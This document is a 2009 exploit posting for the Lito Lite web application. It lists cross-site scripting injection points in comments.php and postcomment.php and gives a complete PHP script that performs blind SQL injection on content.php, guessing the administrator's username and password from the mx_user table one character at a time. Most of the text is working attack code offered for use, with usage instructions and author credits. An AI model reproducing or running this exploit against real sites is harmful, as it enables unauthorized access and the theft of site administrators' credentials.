litolite-sqlxss.txt
Posted on 04 January 2009
#--+++===================================================================================+++--# #--+++====== Lito Lite Multiple Cross Site Scripting / Blind SQL Injection Exploit ======+++--# #--+++===================================================================================+++--# # [+] XSS # [+] comments.php?id=>[js code] # [+] postcomment.php?id=>[js code] #!/usr/bin/php <? function query ($fld, $pos, $ord) { $sql = "x' OR ASCII(SUBSTRING((SELECT {$fld} FROM mx_user WHERE uid = 1),{$pos},1))={$ord} OR '1' = '2"; $sql = str_replace (" ", "%20", $sql); $sql = str_replace ("'", "%27", $sql); return $sql; } function check ($host, $path, $fld, $pos, $char) { $fp = fsockopen ($host, 80); $char = ord ($char); $query = query ($fld, $pos, $char); $req = "GET {$path}/content.php?id={$query} HTTP1.1 ". "Host: {$host} ". "Connection: Close "; fputs ($fp, $req); while (!feof ($fp)) $cont .= trim (fgets ($fp, 1024)); fclose ($fp); $x = array (); preg_match ("/<div id="wrapper">(.+?)div>/", $cont, $x); if (strlen ($x [1]) == 2) return false; else return true; } function brute ($host, $path, $fld, $key) { $pos = 1; $chr = 0; while ($chr < strlen ($key)) { if (check ("localhost", "/xampp/lito_lite", $fld, $pos, $key [$chr])) { $res .= $key [$chr]; $chr = -1; $pos++; } $chr++; } return $res; } function usage () { echo "[+] Lito Lite Blind SQL Injection Exploit ". "[+] Author: darkjoker ~ http://darkjokerside.altervista.org ~ darkjoker93[at]gmail[dot]com ". "[+] Usage: php " . $argv [0] . " <hostname> <path> [key] ". "[+] Ex. php ". $argv [0] . " localhost /lito_lite abcdefghijklmnopqrstuvwxyz0123456789 ". "[+] Greetz to athos, marco6 "; exit (); } if (count ($argv) < 3) usage (); $host = $argv [1]; $path = $argv [2]; if (empty ($argv [3])) $key = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789"; else $key = $argv [3]; echo "[+] Username: " . brute ($host, $path, "username", $key) . " ". "[+] Password: " . brute ($host, $path, "password", $key) . " "; ?>
